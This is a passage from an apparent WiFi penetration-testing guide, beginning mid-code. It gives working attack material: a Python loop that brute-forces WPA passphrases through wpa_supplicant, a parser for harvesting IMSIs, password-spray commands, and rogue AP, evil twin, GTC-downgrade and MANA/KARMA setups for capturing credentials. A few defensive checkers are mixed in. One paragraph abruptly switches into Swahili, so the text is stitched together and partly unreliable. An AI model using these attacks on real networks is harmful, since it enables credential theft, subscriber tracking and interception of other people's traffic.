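        self.sock = socket.socket(socket.AF_UNIX, socket.SOCK_DGRAM)
        self.local = os.path.join(tempfile.mkdtemp(), "ctrl")  # the daemon replies to our bound address
        self.sock.bind(self.local)
        self.sock.connect(path)
        self.sock.settimeout(timeout)
        self.request("ATTACH")

    def request(self, cmd: str) -> str:
        self.sock.send(cmd.encode())
        while True:
            msg = self.sock.recv(4096).decode(errors="replace")
            if not msg.startswith("<"):  # events are tagged "<N>", command replies are not
                return msg.strip()

    def next_event(self) -> str:
        while True:
            msg = self.sock.recv(4096).decode(errors="replace")
            if msg.startswith("<"):
                return msg.strip()


def classify_event(line: str):
    """Map a control-interface event to the outcome of one guess (None = keep waiting)."""
    if "CTRL-EVENT-CONNECTED" in line:
        return "connected"
    if "CTRL-EVENT-DISCONNECTED" in line or "CTRL-EVENT-SSID-TEMP-DISABLED" in line:
        return "failed"  # TEMP-DISABLED is the backoff the dur = 0 patch removes
    return None


def guess_psk(ctrl, ssid: str, candidates):
    """One network entry, one daemon: only SET_NETWORK psk + REASSOCIATE per guess."""
    nid = ctrl.request("ADD_NETWORK")  # returns the new network id, e.g. "0"
    ctrl.request(f'SET_NETWORK {nid} ssid "{ssid}"')
    ctrl.request(f"ENABLE_NETWORK {nid}")
    ctrl.request("SCAN")
    for cand in candidates:
        if ctrl.request(f'SET_NETWORK {nid} psk "{cand}"') != "OK":
            continue  # wpa_supplicant rejects passphrases outside 8..63 chars
        ctrl.request("REASSOCIATE")
        outcome = None
        while outcome is None:
            outcome = classify_event(ctrl.next_event())
        if outcome == "connected":
            return cand
    return None


class FakeCtrl:
    """Constructed stand-in for WpaCtrl so the loop runs without a radio."""

    def __init__(self, real_psk: str) -> None:
        self.real_psk, self.psk, self.events, self.log = real_psk, None, [], []

    def request(self, cmd: str) -> str:
        self.log.append(cmd)
        if cmd == "ADD_NETWORK":
            return "0"
        if cmd.startswith("SET_NETWORK 0 psk "):
            self.psk = cmd.split('"')[1]
            return "OK" if 8 <= len(self.psk) <= 63 else "FAIL"
        if cmd == "REASSOCIATE":
            self.events.append("<3>CTRL-EVENT-CONNECTED - Connection to 64:20:9f:15:4f:d7 completed [id=0]"
                               if self.psk == self.real_psk
                               else "<3>CTRL-EVENT-DISCONNECTED bssid=64:20:9f:15:4f:d7 reason=15")
        return "OK"

    def next_event(self) -> str:
        return self.events.pop(0)


if __name__ == "__main__":
    ctrl = FakeCtrl("letmein-2024")  # swap for WpaCtrl("/var/run/wpa_supplicant/wlp3s0") on a real box
    print("found:", guess_psk(ctrl, "NameOfMyWifi", ["short", "password1", "letmein-2024"]))
```

Each wrong guess still produces a full authentication/association and a failed 4-way handshake on the air, so a WIDS that counts EAPOL failures per BSSID will see this loop clearly.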
WPA Enterprise (MGT)
In enterprise WiFi setups you will encounter various authentication methods, each providing different security levels and management features. When you use tools like airodump-ng to inspect network traffic, you may notice identifiers for these authentication types. Some common methods include:
```
6A:FE:3B:73:18:FB -58 19 0 0 1 195 WPA2 CCMP MGT NameOfMyWifi
```
- EAP-GTC (Generic Token Card):
  - This method supports hardware tokens and one-time passwords within EAP-PEAP. Unlike MSCHAPv2, it does not use a peer challenge and sends the password in cleartext inside the tunnel to the authenticator, which makes it a target for downgrade attacks: a rogue AP that terminates the TLS tunnel gets the password directly.
- EAP-MD5 (Message Digest 5):
  - Involves sending the MD5 hash of the password from the client. It is not recommended because of its vulnerability to dictionary attacks, lack of server authentication, and inability to generate session-specific WEP keys.
- EAP-TLS (Transport Layer Security):
  - Uses both client-side and server-side certificates for authentication and can dynamically generate user- and session-based WEP keys to secure communications.
- EAP-TTLS (Tunneled Transport Layer Security):
  - Provides mutual authentication through an encrypted tunnel, along with a method to derive dynamic, per-user, per-session WEP keys. It requires only server-side certificates, and clients use credentials.
- PEAP (Protected Extensible Authentication Protocol):
  - Works similarly to EAP-TTLS by creating a TLS tunnel for protected communication. It allows weaker authentication protocols on top of EAP because of the protection offered by the tunnel.
  - PEAP-MSCHAPv2: often referred to simply as PEAP, it combines the vulnerable MSCHAPv2 challenge/response mechanism with a protective TLS tunnel.
  - PEAP-EAP-TLS (or PEAP-TLS): similar to EAP-TLS but initiates a TLS tunnel before exchanging certificates, offering an additional layer of security.
You can find more information about these authentication methods here and here.
Username Capture
Reading https://tools.ietf.org/html/rfc3748#page-27 it looks like if you are using EAP the "Identity" messages must be supported, and the username is going to be sent in the clear in the "Response Identity" messages.
Even when using one of the most secure authentication methods, PEAP-EAP-TLS, it is possible to capture the username sent in the EAP protocol. To do so, capture an authentication exchange (start airodump-ng on the channel and wireshark on the same interface) and filter the packets by eapol.
Inside the "Response, Identity" packet, the client's username will appear.
Anonymous Identities
Identity hiding is supported by both EAP-PEAP and EAP-TTLS. In the context of a WiFi network, an EAP-Identity request is typically initiated by the access point (AP) during the association process. To protect the user's anonymity, the response from the EAP client on the user's device contains only the essential information required for the initial RADIUS server to process the request. This concept is illustrated by the following scenarios:
- EAP-Identity = anonymous
  - In this scenario, all users use the pseudonym "anonymous" as their user identifier. The initial RADIUS server acts as either an EAP-PEAP or EAP-TTLS server, handling the server side of the PEAP or TTLS protocol. The inner (protected) authentication method is then either handled locally or delegated to a remote (home) RADIUS server.
- EAP-Identity = anonymous@realm_x
  - In this situation, users from different realms hide their identities while indicating their respective realms. This allows the initial RADIUS server to proxy the EAP-PEAP or EAP-TTLS requests to RADIUS servers in their home realms, which act as the PEAP or TTLS server. The initial RADIUS server operates solely as a RADIUS relay node.
  - Alternatively, the initial RADIUS server may act as the EAP-PEAP or EAP-TTLS server and either handle the protected authentication method or forward it to another server. This option facilitates configuring distinct policies for various realms.
In EAP-PEAP, once the TLS tunnel is established between the PEAP server and the PEAP client, the PEAP server initiates an EAP-Identity request and sends it through the TLS tunnel. The client responds to this second EAP-Identity request by sending an EAP-Identity response containing the user's true identity through the encrypted tunnel. This approach effectively prevents the disclosure of the user's actual identity to anyone eavesdropping on the 802.11 traffic.
EAP-TTLS follows a slightly different procedure. With EAP-TTLS, the client typically authenticates using PAP or CHAP, secured by the TLS tunnel. In this case, the client includes a User-Name attribute and either a Password or CHAP-Password attribute in the initial TLS message sent after tunnel establishment.
Regardless of the protocol chosen, the PEAP/TTLS server learns the user's true identity after the TLS tunnel has been established. The true identity can be represented as user@realm or simply user. If the PEAP/TTLS server is also responsible for authenticating the user, it now possesses the user's identity and proceeds with the authentication method protected by the TLS tunnel. Alternatively, the PEAP/TTLS server may forward a new RADIUS request to the user's home RADIUS server. This new RADIUS request omits the PEAP or TTLS protocol layer. In cases where the protected authentication method is EAP, the inner EAP messages are transmitted to the home RADIUS server without the EAP-PEAP or EAP-TTLS wrapper. The User-Name attribute of the outgoing RADIUS message identifies the user's true identity, replacing the anonymous User-Name from the incoming RADIUS request. When the protected authentication method is PAP or CHAP (supported only by TTLS), the User-Name and other authentication attributes extracted from the TLS payload are substituted into the outgoing RADIUS message, displacing the anonymous User-Name and TTLS EAP-Message attributes found in the incoming RADIUS request.
For more info check https://www.interlinknetworks.com/app_notes/eap-peap.htm
SIM-based EAP (EAP-SIM/EAP-AKA) identity leakage (IMSI exposure)
SIM-based Wi‑Fi authentication using EAP‑SIM/EAP‑AKA over 802.1X can leak the permanent subscriber identifier (IMSI) in cleartext during the unauthenticated identity phase if the deployment doesn’t implement pseudonyms/protected identities or a TLS tunnel around the inner EAP.
Where the leak happens (high level):
- 802.11 association completes to the SSID (often carrier offload SSIDs like FreeWifi_secure, eduroam-like operator realms, etc.).
- Authenticator sends EAP-Request/Identity.
- Vulnerable clients answer EAP-Response/Identity with their permanent identity = IMSI encoded as a 3GPP NAI, prior to any protection.
- Example NAI: 20815XXXXXXXXXX@wlan.mnc015.mcc208.3gppnetwork.org
- Anyone passively listening to RF can read that frame. No 4-way handshake or TLS keying is needed.
Quick PoC: passive IMSI harvesting on EAP-SIM/AKA networks lacking identity privacy
```bash
# 1) Enable monitor mode
airmon-ng start wlan0
# 2) Optional: lock channel to the target BSS
airodump-ng wlan0mon --essid <target-essid> -c <channel>
# 3) Capture 802.1X/EAP frames
#    Wireshark display filters: eap || eapol
#    (identity specifically):  eap.code == 2 && eap.type == 1
#    Kismet: add source wlan0mon; enable 802.1X/EAP views
#    tcpdump (pcap capture):
tcpdump -i wlan0mon -s 0 -w eapsim_identity.pcap
# 4) Wait for a device to auto-connect to the SSID
# 5) Inspect the first EAP-Response/Identity frame
#    Expected: ASCII NAI containing IMSI, e.g.
#    20815XXXXXXXXXX@wlan.mnc015.mcc208.3gppnetwork.org
```
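Step 5 above, done programmatically as an added example (not the page's or any tool's code): parse an EAPOL-encapsulated EAP-Response/Identity (the same frames the `eap.code == 2 && eap.type == 1` filter selects), recognise the 3GPP NAI form, and decide whether the username is a permanent identity (IMSI) or a pseudonym. The IMSI, realm and frames are constructed for the example; the leading `0`/`1` handling follows RFC 4186/4187 (EAP-SIM permanent identities are `1`+IMSI, EAP-AKA `0`+IMSI).

```python
import re

# Added example: pull identities out of EAP-Response/Identity frames and flag
# raw IMSIs. Not the page's code; the frames and IMSI below are constructed.

IMSI_NAI = re.compile(r"^([01]?)(\d{15})@wlan\.mnc(\d{3})\.mcc(\d{3})\.3gppnetwork\.org$")


def build_eap_identity(identity: str, code: int = 2, eap_id: int = 1) -> bytes:
    """Constructed EAPOL(v1, type 0 = EAP-Packet) carrying an EAP Identity (type 1)."""
    data = identity.encode()
    eap = bytes([code, eap_id]) + (5 + len(data)).to_bytes(2, "big") + bytes([1]) + data
    return bytes([1, 0]) + len(eap).to_bytes(2, "big") + eap


def parse_eapol_identity(frame: bytes):
    """Return the identity from an EAP-Response/Identity, or None for anything else."""
    if len(frame) < 9 or frame[1] != 0:  # EAPOL type 0 = EAP-Packet
        return None
    eap = frame[4:4 + int.from_bytes(frame[2:4], "big")]
    code, length, eap_type = eap[0], int.from_bytes(eap[2:4], "big"), eap[4]
    if code != 2 or eap_type != 1 or length > len(eap):  # code 2 = Response, type 1 = Identity
        return None
    return eap[5:length].decode("ascii", errors="replace")


def imsi_from_identity(identity: str):
    """Classify a 3GPP NAI. Permanent ids leak the IMSI; pseudonyms ('3'/'2' prefix)
    and fast re-auth ids ('5'/'4') are not digits-only and are left alone."""
    m = IMSI_NAI.match(identity)
    if not m:
        return None
    prefix, imsi, mnc, mcc = m.groups()
    method = {"1": "EAP-SIM", "0": "EAP-AKA", "": "bare IMSI"}[prefix]
    # the realm's MCC/MNC should match the IMSI prefix (MNC is 2 or 3 digits, zero-padded in the realm)
    realm_ok = imsi.startswith(mcc + mnc) or imsi.startswith(mcc + mnc[1:])
    return {"imsi": imsi, "mcc": mcc, "mnc": mnc, "method": method, "realm_matches": realm_ok}


def harvest_imsis(frames):
    """What a passive listener gets from a pcap: one record per leaked permanent identity."""
    found = []
    for frame in frames:
        identity = parse_eapol_identity(frame)
        info = imsi_from_identity(identity) if identity else None
        if info:
            found.append(info)
    return found


# Constructed capture: one leaking client, one using a pseudonym, one EAP-Request from the AP.
FRAMES = [
    build_eap_identity("1208150123456789@wlan.mnc015.mcc208.3gppnetwork.org"),  # EAP-SIM permanent id
    build_eap_identity("3Ym9wEqGtQ@wlan.mnc015.mcc208.3gppnetwork.org"),        # pseudonym, safe
    build_eap_identity("", code=1),                                              # EAP-Request/Identity
]

if __name__ == "__main__":
    for rec in harvest_imsis(FRAMES):
        print(rec)
```

Running the same classifier over a real capture gives a direct pass/fail for the last mitigation bullet below: a deployment with working pseudonyms produces no `EAP-SIM`/`EAP-AKA`/`bare IMSI` records at all.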
Notes:
- Works before any TLS tunnel if the deployment uses bare EAP-SIM/AKA without protected identity/pseudonyms.
- The exposed value is the permanent identifier bound to the subscriber's SIM; harvesting it enables long-term tracking and downstream telecom abuse.
Impact
- Privacy: persistent user/device tracking from passive Wi-Fi capture in public places.
- Enabler for telecom abuse: with an IMSI, an attacker with SS7/Diameter access can query location or attempt call/SMS interception and MFA theft.
Mitigations / things to check
- Verify that clients use pseudonymous outer identities for EAP-SIM/AKA as mandated by 3GPP (e.g., 3GPP TS 33.402).
- Prefer tunneling the identity phase (e.g., EAP-TTLS/PEAP carrying inner EAP-SIM/AKA) so the IMSI is never sent in the clear.
- A capture of the association/auth exchange should never show a raw IMSI in EAP-Response/Identity.
Related: Telecom signalling exploitation with captured mobile identifiers
[Telecom Network Exploitation](../pentesting-network/telecom-network-exploitation.md)
EAP-Bruteforce (password spray)
If the client is expected to use a username and password (note that EAP-TLS won't be valid in this case), then you could try to get a list of usernames (see the Username Capture section) and passwords and try to brute-force access with air-hammer (https://github.com/Wh1t3Rh1n0/air-hammer).
```bash
./air-hammer.py -i wlan0 -e Test-Network -P UserPassword1 -u usernames.txt
```
You could also perform this attack using eaphammer:
```bash
./eaphammer --eap-spray \
--interface-pool wlan0 wlan1 wlan2 wlan3 wlan4 \
--essid example-wifi \
--password bananas \
--user-list users.txt
```
Client attacks theory
Network selection and roaming
- The 802.11 protocol defines how a station joins an Extended Service Set (ESS) but does not specify the criteria for selecting an ESS or an access point (AP) within it.
- Stations can roam between APs sharing the same ESSID, maintaining connectivity across a building or area.
- The protocol requires the station to authenticate to the ESS but does not require the AP to authenticate to the station.
Preferred Network Lists (PNLs)
- Stations store the ESSID of every wireless network they connect to in their Preferred Network List (PNL), along with network-specific configuration details.
- The PNL is used to automatically connect to known networks, improving the user experience by streamlining the connection process.
Passive scanning
- APs periodically broadcast beacon frames announcing their presence and features, including the AP's ESSID unless broadcasting is disabled.
- During passive scanning, stations listen for beacon frames. If a beacon's ESSID matches an entry in the station's PNL, the station may automatically connect to that AP.
- Knowing a device's PNL allows exploitation by mimicking a known network's ESSID, tricking the device into connecting to a rogue AP.
Active probing
- Active probing involves stations sending probe requests to discover nearby APs and their characteristics.
- Directed probe requests target a specific ESSID, helping detect whether a particular network is in range, even if it is a hidden network.
- Broadcast probe requests have a null SSID field and are sent to all nearby APs, letting the station check for any preferred network without disclosing the contents of its PNL.
Simple AP with redirection to Internet
Kabla ya kuelezea jinsi ya kufanya mashambulizi magumu zaidi, itafafanuliwa jinsi ya kuunda AP na kuelekeza trafiki yake kwa interface iliyounganishwa na Internet.
Tumia ifconfig -a kuthibitisha kuwa interface ya wlan ya kuunda AP na interface iliyounganishwa na Internet zipo.
DHCP & DNS
apt-get install dnsmasq #Manages DHCP and DNS
Unda faili ya usanidi /etc/dnsmasq.conf:
interface=wlan0
dhcp-authoritative
dhcp-range=192.168.1.2,192.168.1.30,255.255.255.0,12h
dhcp-option=3,192.168.1.1
dhcp-option=6,192.168.1.1
server=8.8.8.8
log-queries
log-dhcp
listen-address=127.0.0.1
Then set the IPs and routes:
ifconfig wlan0 up 192.168.1.1 netmask 255.255.255.0
route add -net 192.168.1.0 netmask 255.255.255.0 gw 192.168.1.1
Then start dnsmasq with that configuration file (the -d flag keeps it in the foreground so you can watch the DHCP/DNS log):
dnsmasq -C /etc/dnsmasq.conf -d
hostapd
apt-get install hostapd
Create the configuration file hostapd.conf:
interface=wlan0
driver=nl80211
ssid=MITIWIFI
hw_mode=g
channel=11
macaddr_acl=0
ignore_broadcast_ssid=0
auth_algs=1
wpa=2
wpa_passphrase=mitmwifi123
wpa_key_mgmt=WPA-PSK
wpa_pairwise=CCMP
wpa_group_rekey=86400
ieee80211n=1
wme_enabled=1
Kill interfering processes, set monitor mode, and start hostapd:
airmon-ng check kill
iwconfig wlan0 mode monitor
ifconfig wlan0 up
hostapd ./hostapd.conf
Forwarding and Redirection
iptables --table nat --append POSTROUTING --out-interface eth0 -j MASQUERADE
iptables --append FORWARD --in-interface wlan0 -j ACCEPT
echo 1 > /proc/sys/net/ipv4/ip_forward
Evil Twin
An evil twin attack exploits the way WiFi clients recognise networks, relying mainly on the network name (ESSID) without requiring the base station (access point) to authenticate itself to the client. Key points include:
- Difficulty in Differentiation: Devices struggle to distinguish between legitimate and rogue access points when they share the same ESSID and encryption type. Real-world networks often use multiple access points with the same ESSID to extend coverage seamlessly.
- Client Roaming and Connection Manipulation: The 802.11 protocol allows devices to move between access points within the same ESS. Attackers can exploit this by luring a device into dropping its current base station (access point) and connecting to a rogue one. This can be achieved by offering a stronger signal or by disrupting the connection to the legitimate access point through methods such as deauthentication packets or jamming.
- Challenges in Execution: Successfully executing an evil twin attack in environments with multiple, well-placed access points can be challenging. Deauthenticating a single legitimate access point often results in the device connecting to another legitimate access point unless the attacker can deauthenticate all nearby access points or place the rogue access point strategically.
You can create a very basic Open Evil Twin (no capabilities to route traffic to Internet) by doing:
airbase-ng -a 00:09:5B:6F:64:1E --essid "Elroy" -c 1 wlan0mon
You can also create an Evil Twin using eaphammer (note that to create evil twins with eaphammer, the interface MUST NOT be in monitor mode):
./eaphammer -i wlan0 --essid exampleCorp --captive-portal
Or using Airgeddon: Options: 5,6,7,8,9 (inside Evil Twin attack menu).
Note that by default, if an ESSID in the PNL is saved as WPA protected, the device will not connect automatically to an Open evil twin. You can try to DoS the real AP and hope the user connects manually to your Open evil twin, or you can DoS the real AP and use a WPA Evil Twin to capture the handshake (using this method you won't be able to let the victim connect to you because you don't know the PSK, but you can capture the handshake and try to crack it).
Some OSes and AVs will warn the user that connecting to an Open network is dangerous…
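As an added defensive example (not code from the original page or from the tools above), the following Python flags the evil twin conditions just described over a constructed scan: an authorised ESSID advertised from an unknown BSSID, an open AP using a WPA2 network's name, or a known BSSID cloned with the wrong security type. The inventory, scan rows and BSSIDs are hypothetical sample values.

```python
# Constructed inventory of the organisation's own APs (hypothetical values).
AUTHORISED = {
    "exampleCorp": {"bssids": {"00:11:22:33:44:01", "00:11:22:33:44:02"},
                    "privacy": "WPA2"},
}

# Constructed scan output in a simplified airodump-ng-like layout:
# BSSID, channel, privacy, ESSID. Not a real capture.
SCAN = """\
00:11:22:33:44:01  6  WPA2  exampleCorp
00:11:22:33:44:02  11 WPA2  exampleCorp
00:09:5B:6F:64:1E  1  OPN   exampleCorp
DE:AD:BE:EF:13:37  6  WPA2  exampleCorp
00:11:22:33:44:02  11 OPN   exampleCorp
00:11:22:33:44:03  1  WPA2  GuestNet
"""

def parse_scan(text):
    """Parse the four-column scan layout above into dicts."""
    rows = []
    for line in text.splitlines():
        parts = line.split(None, 3)       # ESSID may contain spaces
        if len(parts) != 4:
            continue
        bssid, channel, privacy, essid = parts
        rows.append({"bssid": bssid.upper(), "channel": int(channel),
                     "privacy": privacy.upper(), "essid": essid})
    return rows

def find_evil_twins(rows, authorised):
    """Return (essid, bssid, channel, kind) for APs advertising one of our
    ESSIDs from an unknown BSSID, or from a known BSSID with the wrong
    security type (a cloned BSSID). ESSIDs not in inventory are ignored."""
    alerts = []
    for r in rows:
        entry = authorised.get(r["essid"])
        if entry is None:
            continue
        if r["bssid"] not in entry["bssids"]:
            kind = "open-evil-twin" if r["privacy"] == "OPN" else "rogue-bssid"
        elif r["privacy"] != entry["privacy"]:
            kind = "security-mismatch"
        else:
            continue
        alerts.append((r["essid"], r["bssid"], r["channel"], kind))
    return alerts
```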
WPA/WPA2 Evil Twin
You can create an Evil Twin using WPA/2, and if the devices are configured to connect to that SSID with WPA/2, they will try to connect. However, to complete the 4-way handshake you also need to know the password the client will use. If you don't know it, the connection won't complete.
./eaphammer -i wlan0 -e exampleCorp -c 11 --creds --auth wpa-psk --wpa-passphrase "mywifipassword"
Enterprise Evil Twin
To understand these attacks I recommend first reading the short WPA Enterprise explanation.
Using hostapd-wpe
hostapd-wpe needs a configuration file to work. To automate the generation of these configurations you can use https://github.com/WJDigby/apd_launchpad (download the python file inside /etc/hostapd-wpe/)
./apd_launchpad.py -t victim -s PrivateSSID -i wlan0 -cn company.com
hostapd-wpe ./victim/victim.conf -s
In the configuration file you can select many different things like ssid, channel, user files, cert/key, dh parameters, wpa version and auth…
Using hostapd-wpe with EAP-TLS to allow any certificate to login.
Using EAPHammer
# Generate Certificates
./eaphammer --cert-wizard
# Launch Attack
./eaphammer -i wlan0 --channel 4 --auth wpa-eap --essid CorpWifi --creds
By default, EAPHammer offers these authentication methods (note GTC first, to try to obtain plaintext passwords, followed by the more robust auth methods):
GTC,MSCHAPV2,TTLS-MSCHAPV2,TTLS,TTLS-CHAP,TTLS-PAP,TTLS-MSCHAP,MD5
This is the default methodology to avoid long connection times. However, you can also tell the server to offer the authentication methods from weakest to strongest:
--negotiate weakest
Or you can also use:
- --negotiate gtc-downgrade to use the highly efficient GTC downgrade implementation (plaintext passwords)
- --negotiate manual --phase-1-methods PEAP,TTLS --phase-2-methods MSCHAPV2,GTC,TTLS-PAP to specify manually the methods offered (by offering the same auth methods in the same order as the organisation, the attack will be much harder to detect).
- Find more info in the wiki
When clients skip RADIUS certificate validation (PEAP/TTLS)
- If devices are configured with "do not validate certificate", a cloned AP + rogue RADIUS (eaphammer --cert-wizard --creds --auth wpa-eap) will harvest NetNTLMv2 (PEAP-MSCHAPv2) or cleartext creds (PEAP-GTC).
- A bettercap deauth (wifi.deauth <BSSID>) reveals hidden SSIDs during probes and forces reconnects, unless PMF/802.11w blocks the spoofed deauth.
- Cracked NetNTLMv2 yields reusable Wi‑Fi/AD creds; GTC yields plaintext immediately.
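The client-side settings that make the PEAP/TTLS evil twin and the GTC/PAP downgrade work are all visible in a wpa_supplicant profile. As an added example (not from the original page or any of the tools it covers), this Python checker parses a network={...} block and flags a missing ca_cert, a missing server-name match, weak inner methods in phase2, and PMF not being required; both profiles are constructed samples, and the CA path and RADIUS name are placeholders.

```python
import re
# Constructed weak profile: no CA pinning, no server-name check, GTC allowed.
WEAK = """
network={
    ssid="exampleCorp"
    key_mgmt=WPA-EAP
    eap=PEAP
    phase2="auth=MSCHAPV2 auth=GTC"
}
"""
# Constructed hardened profile: trusted CA, server name pinned, PMF required,
# inner method restricted so a rogue RADIUS cannot negotiate GTC or PAP.
HARDENED = """
network={
    ssid="exampleCorp"
    key_mgmt=WPA-EAP
    ieee80211w=2
    eap=PEAP
    ca_cert="/etc/ssl/certs/corp-radius-ca.pem"
    domain_match="radius.company.com"
    phase2="auth=MSCHAPV2"
}
"""
# wpa_supplicant options that pin the RADIUS server's certificate name.
NAME_KEYS = ("domain_match", "domain_suffix_match", "subject_match", "altsubject_match")

def parse_network(text):
    """Return the key/value pairs of the first network={...} block."""
    m = re.search(r"network=\{(.*?)\}", text, re.S)
    if not m:
        raise ValueError("no network block")
    opts = {}
    for line in m.group(1).splitlines():
        line = line.strip()
        if line and not line.startswith("#") and "=" in line:
            k, v = line.split("=", 1)
            opts[k.strip()] = v.strip().strip('"')
    return opts

def audit(opts):
    """Return findings for a PEAP/TTLS profile; an empty list means none."""
    findings = []
    if opts.get("eap") not in ("PEAP", "TTLS"):
        return findings
    if "ca_cert" not in opts:
        findings.append("no ca_cert: any RADIUS certificate is accepted")
    if not any(k in opts for k in NAME_KEYS):
        findings.append("no server name match: any cert from the CA is accepted")
    for weak in ("GTC", "PAP", "MD5"):
        if weak in opts.get("phase2", "").upper():
            findings.append(f"phase2 allows {weak}: server can downgrade to plaintext")
    if opts.get("ieee80211w") != "2":
        findings.append("PMF not required: spoofed deauth can force reconnects")
    return findings
```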
Relaying PEAP-MSCHAPv2 instead of cracking (wpa_sycophant + hostapd-mana)
- For machine accounts with uncrackable random passwords, use an MSCHAPv2 relay: run hostapd-mana as the Evil Twin, passing the MSCHAPv2 exchange to wpa_sycophant, which simultaneously joins the legitimate AP. A successful relay yields authenticated Wi‑Fi without ever obtaining the password.
- Use builds that support the target security level (WPA3/PMF needs recent hostapd/wpa_supplicant); PMF prevents deauth coercion, so wait for clients to rejoin on their own.
Using Airgeddon
Airgeddon can use previously generated certificates to offer EAP authentication to WPA/WPA2-Enterprise networks. The fake network will downgrade the connection protocol to EAP-MD5 so it will be able to capture the user and the MD5 of the password. Later, the attacker can try to crack the password. Airgeddon offers you the possibility of a continuous Evil Twin attack (noisy) or only creating the Evil Twin until someone connects (smooth).
Debugging PEAP and EAP-TTLS TLS tunnels in Evil Twins attacks
This method was tested on a PEAP connection, but since it decrypts an arbitrary TLS tunnel it should also work with EAP-TTLS.
Inside the configuration of hostapd-wpe, comment out the line that contains dh_file (from dh_file=/etc/hostapd-wpe/certs/dh to #dh_file=/etc/hostapd-wpe/certs/dh)
This will make hostapd-wpe exchange keys using RSA instead of DH, so you will be able to decrypt the traffic later knowing the server's private key.
Now start the Evil Twin using hostapd-wpe with that modified configuration as usual. Also, start Wireshark on the interface that is performing the Evil Twin attack.
Now or later (when you have already captured some authentication attempts) you can add the private RSA key to Wireshark in: Edit --> Preferences --> Protocols --> TLS --> (RSA keys list) Edit...
Add a new entry and fill in the form with these values: IP address = any, Port = 0, Protocol = data, Key File (select your key file; to avoid problems select a key file that is not password protected).
And look at the new "Decrypted TLS" tab:
KARMA, MANA, Loud MANA and Known beacons attack
ESSID and MAC black/whitelists
The different types of Media Access Control Filter Lists (MFACLs) and their modes, with the corresponding effect on the behaviour of a rogue Access Point (AP):
- MAC-based Whitelist:
- The rogue AP will respond only to probe requests from devices on the whitelist, remaining invisible to all others not listed.
- MAC-based Blacklist:
- The rogue AP will ignore probe requests from devices on the blacklist, effectively making the rogue AP invisible to those specific devices.
- SSID-based Whitelist:
- The rogue AP will respond to probe requests only for the specific ESSIDs listed, making it invisible to devices whose Preferred Network Lists (PNLs) do not contain those ESSIDs.
- SSID-based Blacklist:
- The rogue AP will not respond to probe requests for the specific ESSIDs on the blacklist, making it invisible to devices looking for those particular networks.
# example EAPHammer MFACL file, wildcards can be used
09:6a:06:c8:36:af
37:ab:46:7a:9a:7c
c7:36:8c:b2:*:*
[--mac-whitelist /path/to/mac/whitelist/file.txt #EAPHammer whitelisting]
[--mac-blacklist /path/to/mac/blacklist/file.txt #EAPHammer blacklisting]
# example ESSID-based MFACL file
name1
name2
name3
[--ssid-whitelist /path/to/mac/whitelist/file.txt]
[--ssid-blacklist /path/to/mac/blacklist/file.txt]
KARMA
This method lets an attacker create a malicious access point (AP) that responds to all probe requests from devices seeking to connect to networks. The technique tricks devices into connecting to the attacker's AP by mimicking the networks the devices are looking for. Once a device sends a connection request to this rogue AP, the connection is completed, and the device ends up mistakenly connected to the attacker's network.
MANA
Later, devices started ignoring unsolicited network responses, reducing the effectiveness of the original karma attack. However, a new method, the MANA attack, was introduced by Ian de Villiers and Dominic White. This method involves the rogue AP capturing the Preferred Network Lists (PNL) of devices by responding to their broadcast probe requests with network names (SSIDs) the devices had previously solicited. This sophisticated attack bypasses the protections against the original karma attack by exploiting the way devices remember and prioritise known networks.
The MANA attack works by monitoring both directed and broadcast probe requests from devices. For directed requests, it records the device's MAC address and the requested network name, adding this information to a list. When a broadcast request is received, the AP responds with information matching any of the networks on the device's list, enticing the device to connect to the rogue AP.
./eaphammer -i wlan0 --cloaking full --mana --mac-whitelist whitelist.txt [--captive-portal] [--auth wpa-psk --creds]
Loud MANA
The Loud MANA attack is an advanced strategy for when devices do not use directed probing or when their Preferred Network Lists (PNL) are unknown to the attacker. It operates on the principle that devices in the same area are likely to share some network names in their PNLs. Instead of responding selectively, this attack broadcasts probe responses for every network name (ESSID) found in the combined PNLs of all observed devices. This broader approach increases the chance of a device recognising a familiar network and attempting to connect to the rogue Access Point (AP).
./eaphammer -i wlan0 --cloaking full --mana --loud [--captive-portal] [--auth wpa-psk --creds]
Known Beacon attack
When the Loud MANA attack is not enough, the Known Beacon attack offers another approach. This method brute-forces the connection process by simulating an AP that responds to any network name, cycling through a list of potential ESSIDs derived from a wordlist. This simulates the presence of many networks, hoping to match an ESSID in the victim's PNL and prompt a connection attempt to the fabricated AP. The attack can be amplified by combining it with the --loud option for a more aggressive attempt to lure devices.
Eaphammer implemented this attack as a MANA attack where all the ESSIDs in a list are broadcast (you can also combine it with --loud to create a Loud MANA + Known beacons attack):
./eaphammer -i wlan0 --mana [--loud] --known-beacons --known-ssids-file wordlist.txt [--captive-portal] [--auth wpa-psk --creds]
Known Beacon Burst attack
The Known Beacon Burst attack involves the rapid broadcasting of beacon frames for each ESSID listed in a file. This creates a dense environment of fake networks, greatly increasing the likelihood of devices connecting to the rogue AP, especially when combined with a MANA attack. The technique uses speed and volume to overwhelm the network selection mechanisms of devices.
# transmit a burst of 5 forged beacon packets for each entry in list
./forge-beacons -i wlan1 \
--bssid de:ad:be:ef:13:37 \
--known-essids-file known-s.txt \
--dst-addr 11:22:33:11:22:33 \
--burst-count 5
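KARMA/MANA and Known Beacon (Burst) rogue APs leave a recognisable trace on the air: one transmitter answering probe requests for many unrelated SSIDs, or beaconing many SSIDs within a short window. As an added detection example (not from the original page or the tools above), this Python runs those two checks over a constructed frame log in a hypothetical "time type transmitter ssid" layout; the thresholds and MAC addresses are illustrative.

```python
from collections import defaultdict

# Constructed frame log (not a real capture): time, frame type, transmitter, SSID.
FRAMES = """\
0.00 beacon     00:11:22:33:44:01 exampleCorp
0.10 beacon     00:11:22:33:44:01 exampleCorp
0.12 probe_req  AA:BB:CC:00:00:01 HomeNet
0.13 probe_resp DE:AD:BE:EF:13:37 HomeNet
0.15 probe_req  AA:BB:CC:00:00:02 CoffeeShop
0.16 probe_resp DE:AD:BE:EF:13:37 CoffeeShop
0.20 probe_req  AA:BB:CC:00:00:03 AirportFree
0.21 probe_resp DE:AD:BE:EF:13:37 AirportFree
0.30 beacon     DE:AD:BE:EF:13:37 HomeNet
0.31 beacon     DE:AD:BE:EF:13:37 CoffeeShop
0.32 beacon     DE:AD:BE:EF:13:37 AirportFree
0.33 beacon     DE:AD:BE:EF:13:37 HotelGuest
0.34 beacon     DE:AD:BE:EF:13:37 LibraryWifi
0.40 probe_resp 00:11:22:33:44:01 exampleCorp
"""

def parse_frames(text):
    frames = []
    for line in text.splitlines():
        t, kind, src, ssid = line.split(None, 3)
        frames.append((float(t), kind, src.upper(), ssid))
    return frames

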